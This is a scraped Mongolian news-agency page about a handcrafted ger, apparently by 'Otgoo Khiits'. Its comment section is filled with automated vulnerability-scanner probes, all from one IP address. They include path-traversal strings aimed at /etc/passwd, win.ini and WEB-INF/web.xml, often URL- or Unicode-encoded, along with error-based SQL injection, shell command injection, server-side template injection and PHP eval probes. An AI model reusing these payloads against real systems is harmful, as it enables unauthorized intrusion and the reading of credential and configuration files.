“Отгоо хийц”-ийн монгол гэр

МОНГОЛ БРЭНД
montastudio@montsame.gov.mn
2022-10-15 17:59:03
Холбоотой мэдээ
Сэтгэгдлүүд
 • ../../../../WEB-INF/web.xml;admin 194.163.191.42 23 өдөр

  123456
 • ../../../../WEB-INF/web.xml 194.163.191.42 23 өдөр

  123456
 • ../../../WEB-INF/web.xml;admin 194.163.191.42 23 өдөр

  123456
 • ../../../WEB-INF/web.xml 194.163.191.42 23 өдөр

  123456
 • ../../WEB-INF/web.xml;admin 194.163.191.42 23 өдөр

  123456
 • ../../WEB-INF/web.xml 194.163.191.42 23 өдөр

  123456
 • ../WEB-INF/web.xml;admin 194.163.191.42 23 өдөр

  123456
 • ../WEB-INF/web.xml 194.163.191.42 23 өдөр

  123456
 • WEB-INF/web.xml;admin 194.163.191.42 23 өдөр

  123456
 • WEB-INF/web.xml 194.163.191.42 23 өдөр

  123456
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215Windows%u2215win%u002eini 194.163.191.42 23 өдөр

  123456
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows%2fwin%2eini 194.163.191.42 23 өдөр

  123456
 • ../../../../../../Windows/win.iniadmin 194.163.191.42 23 өдөр

  123456
 • ./../../../../../../Windows/win.ini 194.163.191.42 23 өдөр

  123456
 • ../../../../../../Windows/win.ini 194.163.191.42 23 өдөр

  123456
 • admin 194.163.191.42 23 өдөр

  123456'"\(
 • admin 194.163.191.42 23 өдөр

  123456鎈'"\(
 • admin 194.163.191.42 23 өдөр

  123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1334914460')))>'0
 • ../../../../../../../../../../../../../../../../../../Windows/win.iniadmin 194.163.191.42 23 өдөр

  123456
 • admin 194.163.191.42 23 өдөр

  convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1721914517')))
 • admin 194.163.191.42 23 өдөр

  123456/**/and/**/cast(md5('1644992248')as/**/int)>0
 • admin 194.163.191.42 23 өдөр

  123456'and(select'1'from/**/cast(md5(1682451301)as/**/int))>'0
 • ./../../../../../../../../../../../../../../../../../../Windows/win.ini 194.163.191.42 23 өдөр

  123456
 • admin 194.163.191.42 23 өдөр

  extractvalue(1,concat(char(126),md5(1809669062)))
 • ../../../../../../../../../../../../../../../../../../Windows/win.ini 194.163.191.42 23 өдөр

  123456
 • admin 194.163.191.42 23 өдөр

  123456"and/**/extractvalue(1,concat(char(126),md5(1724891402)))and"
 • %u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216Windows%u2216win%u002eini 194.163.191.42 23 өдөр

  123456
 • admin 194.163.191.42 23 өдөр

  123456'and/**/extractvalue(1,concat(char(126),md5(1352708893)))and'
 • %2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin%2eini 194.163.191.42 23 өдөр

  123456
 • ..\..\..\..\..\..\Windows\win.iniadmin 194.163.191.42 23 өдөр

  123456
 • .\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 23 өдөр

  123456
 • ..\..\..\..\..\..\Windows\win.ini 194.163.191.42 23 өдөр

  123456
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.iniadmin 194.163.191.42 23 өдөр

  123456
 • admin 194.163.191.42 23 өдөр

  expr 907744006 + 866605594
 • #set($c=999234727+965348808)${c}$c 194.163.191.42 23 өдөр

  123456
 • .\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 23 өдөр

  123456
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 23 өдөр

  123456
 • %u2215etc%u2215passwd 194.163.191.42 23 өдөр

  123456
 • admin 194.163.191.42 23 өдөр

  123456&set /A 900218463+974790455
 • %2fetc%2fpasswd 194.163.191.42 23 өдөр

  123456
 • /etc/passwdadmin 194.163.191.42 23 өдөр

  123456
 • admin 194.163.191.42 23 өдөр

  123456$(expr 883123476 + 856360670)
 • ${(953255313+858597271)?c} 194.163.191.42 23 өдөр

  123456
 • admin 194.163.191.42 23 өдөр

  123456|expr 985891988 + 910564186
 • ${964356376+903817401} 194.163.191.42 23 өдөр

  123456
 • /etc/passwd 194.163.191.42 23 өдөр

  123456
 • admin 194.163.191.42 23 өдөр

  123456 expr 886672263 + 832971071
 • /*1*/{{842573802+812984425}} 194.163.191.42 23 өдөр

  123456
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215etc%u2215passwd 194.163.191.42 23 өдөр

  123456
 • admin'"\( 194.163.191.42 23 өдөр

  123456
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd 194.163.191.42 23 өдөр

  123456
 • admin 194.163.191.42 23 өдөр

  <%- 824265507+926398492 %>
 • admin鎈'"\( 194.163.191.42 23 өдөр

  123456
 • ./../../../../../../etc/passwd 194.163.191.42 23 өдөр

  123456
 • admin 194.163.191.42 23 өдөр

  #set($c=895052105+804331516)${c}$c
 • admin'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1267168383')))>'0 194.163.191.42 23 өдөр

  123456
 • ../../../../../../etc/passwdadmin 194.163.191.42 23 өдөр

  123456
 • admin 194.163.191.42 23 өдөр

  ${(997608125+807921797)?c}
 • convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1023511464'))) 194.163.191.42 23 өдөр

  123456
 • ../../../../../../etc/passwd 194.163.191.42 23 өдөр

  123456
 • admin 194.163.191.42 23 өдөр

  ${880396329+976335152}
 • admin/**/and/**/cast(md5('1284632794')as/**/int)>0 194.163.191.42 23 өдөр

  123456
 • admin 194.163.191.42 23 өдөр

  /*1*/{{877145238+867411231}}
 • admin 194.163.191.42 23 өдөр

  123456
 • admin'and(select'1'from/**/cast(md5(1306059295)as/**/int))>'0 194.163.191.42 23 өдөр

  123456
 • extractvalue(1,concat(char(126),md5(1053624985))) 194.163.191.42 23 өдөр

  123456
 • ${957681977+939209305} 194.163.191.42 23 өдөр

  123456
 • expr 973805835 + 981372976 194.163.191.42 23 өдөр

  123456
 • admin"and/**/extractvalue(1,concat(char(126),md5(1610868304)))and" 194.163.191.42 23 өдөр

  123456
 • ./../../../../../../../../../../../../../../../../../../etc/passwd 194.163.191.42 23 өдөр

  123456
 • admin&set /A 899614922+971729594 194.163.191.42 23 өдөр

  123456
 • '-var_dump(md5(959416198))-' 194.163.191.42 23 өдөр

  123456
 • admin$(expr 850416013 + 858721006) 194.163.191.42 23 өдөр

  123456
 • admin 194.163.191.42 23 өдөр

  ${842519660+865459925}
 • ${@var_dump(md5(270396142))}; 194.163.191.42 23 өдөр

  123456
 • qvfldbcvbbspndmpprez 194.163.191.42 23 өдөр

  123456
 • admin'and/**/extractvalue(1,concat(char(126),md5(1261683687)))and' 194.163.191.42 23 өдөр

  123456
 • admin 194.163.191.42 23 өдөр

  '-var_dump(md5(159698455))-'
 • admin|expr 830631687 + 934935515 194.163.191.42 23 өдөр

  123456
 • admin 194.163.191.42 23 өдөр

  qvfldbcvbbspndmpprez
 • admin 194.163.191.42 23 өдөр

  ${@var_dump(md5(882262023))};
 • admin 194.163.191.42 23 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwdadmin 194.163.191.42 23 өдөр

  123456
 • admin expr 975029603 + 899732747 194.163.191.42 23 өдөр

  123456
 • admin 194.163.191.42 23 өдөр

  123456
 • admin 194.163.191.42 23 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwd 194.163.191.42 23 өдөр

  123456
 • admin 194.163.191.42 23 өдөр

  123456
 • admin 194.163.191.42 23 өдөр

  123456